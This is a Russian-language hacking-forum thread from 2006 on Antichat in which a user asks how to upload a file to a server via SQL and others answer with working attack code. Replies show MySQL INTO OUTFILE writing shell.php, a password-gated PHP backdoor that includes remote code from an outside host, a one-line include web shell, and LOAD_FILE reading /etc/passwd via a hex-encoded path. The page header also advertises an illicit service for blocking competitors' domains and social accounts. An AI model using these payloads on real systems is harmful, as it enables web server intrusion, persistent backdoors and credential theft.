УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Помогите с Sql

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Помогите с Sql

17.12.2006, 18:20

TAZMAD

Новичок

Регистрация: 19.11.2004

Сообщений: 6

Провел на форуме:
65817

Репутация: 0

Помогите с Sql

Здравствуйте, хотел бы спросить у более знающих, какой командой можно залить файл на сервер с помощью Sql.

Зарание благодарен....

17.12.2006, 18:28

InferNo23

Участник форума

Регистрация: 05.09.2006

Сообщений: 187

Провел на форуме:
6860213

Репутация: 378

select 'file_content' INTO OUTFILE '/путь'

17.12.2006, 18:29

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

outfile

Код:

SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';

__________________
Фреймворк для спамера :(
Услуги программирования

17.12.2006, 18:58

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

Точнее сначала нужно засунуть в запись name с id=0 пхп код ) я например люблю что-ниб вроде

PHP код:


		
			
<? 

if ($_POST ['someshit'] == "killme")

{

include ("http://someshit.nm.ru/br/s.php");

} 

else 

{

die;

}

?>

а уже после делать то что написал Green_Bear =)

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

18.12.2006, 01:47

nc.STRIEM

Members of Antichat - Level 5

Регистрация: 05.04.2006

Сообщений: 1,066

Провел на форуме:
3493315

Репутация: 1228

Отправить сообщение для nc.STRIEM с помощью ICQ

а не проще ли сделать

Код:

SELECT '<? include($i); ?>' FROM table INTO OUTFILE '/path/to/file/shell.php';

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

18.12.2006, 04:05

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

а если путь не известен?

18.12.2006, 07:09

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

а если путь не известен?

То узнай его...

18.12.2006, 22:18

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

Цитата:

Сообщение от [ cash ]

То узнай его...

Как если ошибка не выводится?

18.12.2006, 22:40

SQLHACK

Голос разума

Регистрация: 27.09.2006

Сообщений: 529

Провел на форуме:
1607210

Репутация: 1617

Отправить сообщение для SQLHACK с помощью ICQ

что мешает тебе загрузить /etc/passwd/, что то типа SELECT LOAD_FILE(0x2F6574632F7061737377642F) FROM table/*

это даст некое начало, исходя остальной путь пожно попробовать домумать и сделать INTO OUTFILE

или залить в /tmp/ а оттуда заинклюдить, если есть локальный инклюд.

А какая версия SQL сервера mysql, mssql &

#10

19.12.2006, 05:07